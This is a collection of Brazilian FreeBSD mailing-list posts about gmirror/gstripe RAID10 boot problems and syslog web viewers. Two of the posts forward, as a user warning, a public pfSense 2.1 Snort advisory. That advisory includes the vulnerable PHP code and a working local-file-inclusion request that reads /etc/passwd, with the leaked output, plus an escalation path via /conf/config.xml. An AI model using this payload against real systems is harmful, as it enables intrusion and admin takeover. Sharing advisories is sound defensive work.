Re: [FUG-BR] Carregamento do gmirror e gstripe no loader.conf
Em 28/01/14 21:54, Paulo Henrique escreveu: > > Enviado do meu smartphone Sony Xperia™ > > Marcelo Gondim escreveu > >> Pessoal, >> >> Estou tentando faz um tempo colocar todo o disco inclusive o raiz em >> gmirror+gstripe(raid10) pra bootar e não consigo. Quando inicia o boot >> já manda na lata o Not ufs. >> Creio que o motivo seja porque para carregar o geom é necessário >> primeiramente carregar o kernel. O zfs funciona porque tem um boot >> específico para ele. >> Só vi uma solução: colocar o / fora do raid e colocar o restante /usr, >> swap, /var e /tmp no raid10. Alguém já conseguiu bootar o sistema com >> tudo no geom raid? >> >> Meu loader.conf: >> >> geom_mirror_load="YES" >> geom_stripe_load="YES" >> vfs.root.mountfrom="ufs:/dev/stripe/root" >> >> []'s >> Gondim >> > Como esta criando raid10? > Gstripe = gmirror+ gmirror ou > Gmirror = gstripe + gstripe? > Opa Paulo, Fiz assim aqui na VM que criei: ada0 - 10Gb ada1 - 10Gb ada2 - 10Gb ada3 - 10Gb Criei em cada disco as partições: / swap /var /usr /tmp root0,swap0,var0,usr0 e tmp0 root1,swap1,var1,usr1 e tmp1 root2,swap2,var2,usr2 e tmp2 root3,swap3,var3,usr3 e tmp3 Fiz primeiro o gmirror: gmirror label root0 /dev/gpt/root0 /dev/gpt/root1 gmirror label swap0 /dev/gpt/swap0 /dev/gpt/swap1 gmirror label var0 /dev/gpt/var0 /dev/gpt/var1 gmirror label usr0 /dev/gpt/usr0 /dev/gpt/usr1 gmirror label tmp0 /dev/gpt/tmp0 /dev/gpt/tmp1 gmirror label root1 /dev/gpt/root2 /dev/gpt/root3 gmirror label swap1 /dev/gpt/swap2 /dev/gpt/swap3 gmirror label var1 /dev/gpt/var2 /dev/gpt/var3 gmirror label usr1 /dev/gpt/usr2 /dev/gpt/usr3 gmirror label tmp1 /dev/gpt/tmp2 /dev/gpt/tmp3 Aí depois fiz o gstripe: gstripe label root /dev/mirror/root0 /dev/mirror/root1 gstripe label swap /dev/mirror/swap0 /dev/mirror/swap1 gstripe label var /dev/mirror/var0 /dev/mirror/var1 gstripe label usr /dev/mirror/usr0 /dev/mirror/usr1 gstripe label tmp /dev/mirror/tmp0 /dev/mirror/tmp1 Pelo que percebi eu não consigo carregar o gstripe e o gmirror antes do kernel ser carregado e por isso o /boot não fica visível, dando o tal erro: Not ufs O que funcionou para mim foi tirar o / do gmirror e gstripe, aí nesse caso carregou o kernel e o módulo gmirror e gstripe. O restante funcionou de boa. A minha dúvida era se existe alguma maneira de carregar o gmirror e gstripe antes de tudo, como o tal initrd do Linux. []'s Gondim - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Carregamento do gmirror e gstripe no loader.conf
Enviado do meu smartphone Sony Xperia™ Marcelo Gondim escreveu > Pessoal, > > Estou tentando faz um tempo colocar todo o disco inclusive o raiz em > gmirror+gstripe(raid10) pra bootar e não consigo. Quando inicia o boot > já manda na lata o Not ufs. > Creio que o motivo seja porque para carregar o geom é necessário > primeiramente carregar o kernel. O zfs funciona porque tem um boot > específico para ele. > Só vi uma solução: colocar o / fora do raid e colocar o restante /usr, > swap, /var e /tmp no raid10. Alguém já conseguiu bootar o sistema com > tudo no geom raid? > > Meu loader.conf: > > geom_mirror_load="YES" > geom_stripe_load="YES" > vfs.root.mountfrom="ufs:/dev/stripe/root" > > []'s > Gondim > Como esta criando raid10? Gstripe = gmirror+ gmirror ou Gmirror = gstripe + gstripe? Att. > - > Histórico: http://www.fug.com.br/historico/html/freebsd/ > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [FYI] pfSense 2.1 Privilege Escalation from less privileged users (LFI/RCE)
Show! (na visão de pesquisa em vulnerabilidades)
@firebitsbr
2014-01-28 Welkson Renny de Medeiros
> Senhores, boa tarde!
>
> Alerta pra quem usa o package Snort no pfSense.
>
> Welkson
>
> ...
>
> ##
> # _ ___ _ _ _ _
> # | | / _ \| \ | |/ ___|/ ___| / \|_ _|
> # | | | | | | \| | | _| | / _ \ | |
> # | |__| |_| | |\ | |_| | |___ / ___ \| |
> # |_\___/|_| \_|\|\/_/ \_\_|
> #
> # Exploit Title: pfSense 2.1 Privilege Escalation from less privileged
> users (LFI/RCE)
> # Date: 25/01/2014 (0-day)
> # Exploit Author: @u0x (Pichaya Morimoto)
> # Software Link: www.pfsense.org
> # Category: Local File Inclusion (LFI) & Privilege Escalation
> # Version: pfSense 2.1 build 20130911-1816 with snort 2.9.5.5 pkg v.3.0.2
> #
> #
>
>
>
> pfSense firewall/router distribution description :
>
> ==
>
> pfSense is a free, open source customized distribution of FreeBSD tailored
> for use as a firewall and router. In addition to being a powerful, flexible
> firewalling and routing platform, it includes a long list of related
> features and a package system allowing further expandability without adding
> bloat and potential security vulnerabilities to the base distribution.
> pfSense is a popular project with more than 1 million downloads since its
> inception, and proven in countless installations ranging from small home
> networks protecting a PC and an Xbox to large corporations, universities
> and other organizations protecting thousands of network devices.
>
> This project started in 2004 as a fork of the m0n0wall project, but focused
> towards full PC installations rather than the embedded hardware focus of
> m0n0wall. pfSense also offers an embedded image for Compact Flash based
> installations, however it is not our primary focus.
>
> Attack Scenario
>
> ==
>
> Authenticated users with only permission to access some packages in web gui
> (a.k.a. webConfigurator) will be able to escalate themselves to other
> privileged admin by reading /conf/config.xml file through bugs (i.e. Snort
> LFI), result in fully compromise the pfSense.
>
> This attack abuse the user privilege scheme with some of official packages
> (System > Package Manager)
>
> * Session Hijacking also possible to steal less privileged user sessions to
> perform this trick due to "http" admin by default webConfigurator.
>
> Sample bug #1 : Snort Admin Privilege Escalation via Local File Inclusion
> Vulnerability
>
> Vulnerable file:
>
> ==
>
> snort_log_view.php
>
> [+] Checksum
> SHA1: ec1330e804eb028f2410c8ef9439df103bb2764c
> MD5: cd767e46a4e9e09ede7fd26560e37f14
>
> Vulnerable Source Code :
> ==
> http://www.pfsense.com/packages/config/snort/snort_log_view.php
>
> https://github.com/pfsense/pfsense-packages/blob/master/config/snort/snort_log_view.php
>
> ...(deducted)...
>
> $contents = '';
> // Read the contents of the argument passed to us.
> // Is it a fully qualified path and file?
>
> if (file_exists($_GET['logfile']))
>$contents = file_get_contents($_GET['logfile']);
> // It is not something we can display, so print an error.
> else
>$contents = gettext("\n\nERROR -- File: {$_GET['logfile']} not
> found!");
> $pgtitle = array(gettext("Snort"), gettext("Log File Viewer"));
> ?>
>
> ...(deducted)...
> cols="80" name="code2">
> ...(deducted)...
>
>
>
> Proof of Concept 1 : Arbitrary File Inclusion
> ==
>
> GET /snort/snort_log_view.php?logfile=/etc/passwd HTTP/1.1
> Host: firewall1.pentestlab1:1337
> Connection: keep-alive
> Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
> Accept-Encoding: gzip,deflate,sdch
> Accept-Language: th,en-US;q=0.8,en;q=0.6
> Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083
>
> HTTP/1.1 200 OK
> Expires: Mon, 27 Jan 2014 07:25:10 GMT
> Expires: Thu, 19 Nov 1981 08:52:00 GMT
> Cache-Control: max-age=18
> Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
> pre-check=0
> Last-Modified: Sat, 25 Jan 2014 05:25:10 GMT
> X-Frame-Options: SAMEORIGIN
> Pragma: no-cache
> Content-type: text/html
> Transfer-Encoding: chunked
> Date: Sat, 25 Jan 2014 05:25:10 GMT
> Server: lighttpd/1.4.32
>
> ...(deducted)...
>
> id="textareaitem">
> rows="33" cols="80" name="code2">root:*:0:0:Charlie &:/root:/bin/sh
> toor:*:0:0:Bourne-again Superuser:/root:
> daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> operator:*:2:5:System &:/:/usr/sbin/nologin
> ...(deducted)...
> havp:*:10
[FUG-BR] Carregamento do gmirror e gstripe no loader.conf
Pessoal, Estou tentando faz um tempo colocar todo o disco inclusive o raiz em gmirror+gstripe(raid10) pra bootar e não consigo. Quando inicia o boot já manda na lata o Not ufs. Creio que o motivo seja porque para carregar o geom é necessário primeiramente carregar o kernel. O zfs funciona porque tem um boot específico para ele. Só vi uma solução: colocar o / fora do raid e colocar o restante /usr, swap, /var e /tmp no raid10. Alguém já conseguiu bootar o sistema com tudo no geom raid? Meu loader.conf: geom_mirror_load="YES" geom_stripe_load="YES" vfs.root.mountfrom="ufs:/dev/stripe/root" []'s Gondim - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] [FYI] pfSense 2.1 Privilege Escalation from less privileged users (LFI/RCE)
Senhores, boa tarde!
Alerta pra quem usa o package Snort no pfSense.
Welkson
...
##
# _ ___ _ _ _ _
# | | / _ \| \ | |/ ___|/ ___| / \|_ _|
# | | | | | | \| | | _| | / _ \ | |
# | |__| |_| | |\ | |_| | |___ / ___ \| |
# |_\___/|_| \_|\|\/_/ \_\_|
#
# Exploit Title: pfSense 2.1 Privilege Escalation from less privileged
users (LFI/RCE)
# Date: 25/01/2014 (0-day)
# Exploit Author: @u0x (Pichaya Morimoto)
# Software Link: www.pfsense.org
# Category: Local File Inclusion (LFI) & Privilege Escalation
# Version: pfSense 2.1 build 20130911-1816 with snort 2.9.5.5 pkg v.3.0.2
#
#
pfSense firewall/router distribution description :
==
pfSense is a free, open source customized distribution of FreeBSD tailored
for use as a firewall and router. In addition to being a powerful, flexible
firewalling and routing platform, it includes a long list of related
features and a package system allowing further expandability without adding
bloat and potential security vulnerabilities to the base distribution.
pfSense is a popular project with more than 1 million downloads since its
inception, and proven in countless installations ranging from small home
networks protecting a PC and an Xbox to large corporations, universities
and other organizations protecting thousands of network devices.
This project started in 2004 as a fork of the m0n0wall project, but focused
towards full PC installations rather than the embedded hardware focus of
m0n0wall. pfSense also offers an embedded image for Compact Flash based
installations, however it is not our primary focus.
Attack Scenario
==
Authenticated users with only permission to access some packages in web gui
(a.k.a. webConfigurator) will be able to escalate themselves to other
privileged admin by reading /conf/config.xml file through bugs (i.e. Snort
LFI), result in fully compromise the pfSense.
This attack abuse the user privilege scheme with some of official packages
(System > Package Manager)
* Session Hijacking also possible to steal less privileged user sessions to
perform this trick due to "http" admin by default webConfigurator.
Sample bug #1 : Snort Admin Privilege Escalation via Local File Inclusion
Vulnerability
Vulnerable file:
==
snort_log_view.php
[+] Checksum
SHA1: ec1330e804eb028f2410c8ef9439df103bb2764c
MD5: cd767e46a4e9e09ede7fd26560e37f14
Vulnerable Source Code :
==
http://www.pfsense.com/packages/config/snort/snort_log_view.php
https://github.com/pfsense/pfsense-packages/blob/master/config/snort/snort_log_view.php
...(deducted)...
$contents = '';
// Read the contents of the argument passed to us.
// Is it a fully qualified path and file?
if (file_exists($_GET['logfile']))
$contents = file_get_contents($_GET['logfile']);
// It is not something we can display, so print an error.
else
$contents = gettext("\n\nERROR -- File: {$_GET['logfile']} not
found!");
$pgtitle = array(gettext("Snort"), gettext("Log File Viewer"));
?>
...(deducted)...
...(deducted)...
Proof of Concept 1 : Arbitrary File Inclusion
==
GET /snort/snort_log_view.php?logfile=/etc/passwd HTTP/1.1
Host: firewall1.pentestlab1:1337
Connection: keep-alive
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: th,en-US;q=0.8,en;q=0.6
Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083
HTTP/1.1 200 OK
Expires: Mon, 27 Jan 2014 07:25:10 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=18
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Last-Modified: Sat, 25 Jan 2014 05:25:10 GMT
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Content-type: text/html
Transfer-Encoding: chunked
Date: Sat, 25 Jan 2014 05:25:10 GMT
Server: lighttpd/1.4.32
...(deducted)...
root:*:0:0:Charlie &:/root:/bin/sh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
...(deducted)...
havp:*:1003:2000:havp daemon:/nonexistent:/sbin/nologin
squid:*:100:100:squid caching-proxy pseudo user:/var/squid:/usr/sbin/nologin
c_icap:*:959:959:c-icap daemon:/var/empty:/usr/sbin/nologin
snortadmin:*:2000:65534:Bill Gates:/home/snortadmin:/sbin/nologin
...(deducted)...
Proof of Concept 2 : Directory Traversal
# This trick works on PHP 5.3.27 with Suhosin-Patch (cgi-fcgi) +
Lighttpd/1.4.32 on FreeBSD 8.3 x64
Re: [FUG-BR] syslog via web
Em 2014-01-27 8:59, mateus schott escreveu: > log-analyzer, phplogcon > > > Mateus Schott > Administrador de Redes > LPI 1 - Junior Level Linux Certification > Novell Certified Linux Administrator > > *“A caixa dizia: Requer MS Windows ou superior. Então instalei Linux.”* > > > Em 27 de janeiro de 2014 08:54, Denis Granato > escreveu: > >> Bom dia senhores, >> >> Alguém utiliza alguma ferramenta para visualização de logs (syslog) >> via web? >> >> Tenho alguns monitoramentos na minha rede e recebo em >> /var/log/syslog-x.log , syslog-y.log, etc e gostaria >> de disponibilizar para visualização para meu NOC >> >> Obrigado Além do loganalyzer, eu tentei usar uma solução com o elasticsearch + logstash + kibana (visualizador). É muito rápido para pesquisar os logs (tem que aprender a sintaxe do apache lucene, mas o básico é simples). Eu tive um problema em que o elasticsearch ficava consumindo todos os fd do sistema e mesmo aumentando o kern.maxfiles e kern.maxfilesperproc para valores bem altos (65k) eu não tive mais tempo de resolver essa questão. Mas fica aí uma outra alternativa. -- vic choppnerd.com donttrack.us | dontbubble.us - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
